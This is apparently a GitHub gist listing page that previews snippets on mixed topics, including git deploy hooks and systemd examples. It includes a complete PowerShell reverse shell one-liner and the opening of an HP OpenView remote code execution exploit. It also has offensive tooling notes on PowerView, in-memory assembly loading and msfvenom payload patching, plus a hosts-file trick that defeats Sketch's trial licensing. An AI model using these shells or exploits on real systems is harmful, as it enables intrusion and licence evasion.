Skip to content

Instantly share code, notes, and snippets.

View PaulSec's full-sized avatar

Paul PaulSec

View GitHub Profile
Arno0x / TestAssembly.cs
Last active May 19, 2024 11:37
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
using System.Windows.Forms;
namespace TestNamespace
kitallis / static-file-server.go
Last active April 16, 2023 03:18
serve static files / directory with http basic auth in Go
Simple static file server with http basic auth in go
-p="8100": port to serve on
-d=".": the directory of static files to host
Navigating to http://localhost:8100 will display the index.html or directory
listing file.
ThunderSon / powershell_reverse_shell.ps1
Created July 9, 2018 13:57 — forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner (no attribution)
$client = New-Object System.Net.Sockets.TCPClient("",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 18, 2024 14:39
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
mgeeky /
Created March 29, 2017 23:55
HP OpenView NNM B.07.50 Remote Code Execution exploit with ASCII encoded egghunter, JO/JNO jump-over-SEH trick and stack aligned. Written during OSCE/CTP course.
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'
import struct
import socket
HOST = '192.168.XXX.YYY'
PORT = 7510
mgeeky /
Last active November 14, 2023 19:45
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for WaitForSingleObject call within modern msfvenom generated payload.


This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.


mubix /
Last active April 7, 2024 22:35
How to start in Infosec
Bhavdip /
Created October 6, 2016 15:53
Modify Sketch to never ending trial

###Sketch trial non stop

Open hosts files:

$ open /private/etc/hosts

Edit the file adding:

noelboss /
Last active June 12, 2024 00:28
Simple automated GIT Deployment using Hooks

Simple automated GIT Deployment using GIT Hooks

Here are the simple steps needed to create a deployment from your local GIT repository to a server based on this in-depth tutorial.

How it works

You are developing in a working-copy on your local machine, lets say on the master branch. Most of the time, people would push code to a remote server like or and pull or export it to a production server. Or you use a service like to act upon a Web-Hook that's triggered that service.

drmalex07 /
Last active May 15, 2024 10:52
An example with an oneshot service on systemd. #systemd #systemd.service #oneshot


Services declared as oneshot are expected to take some action and exit immediatelly (thus, they are not really services, no running processes remain). A common pattern for these type of service is to be defined by a setup and a teardown action.

Let's create a example foo service that when started creates a file, and when stopped it deletes it.

Define setup/teardown actions

Create executable file /opt/foo/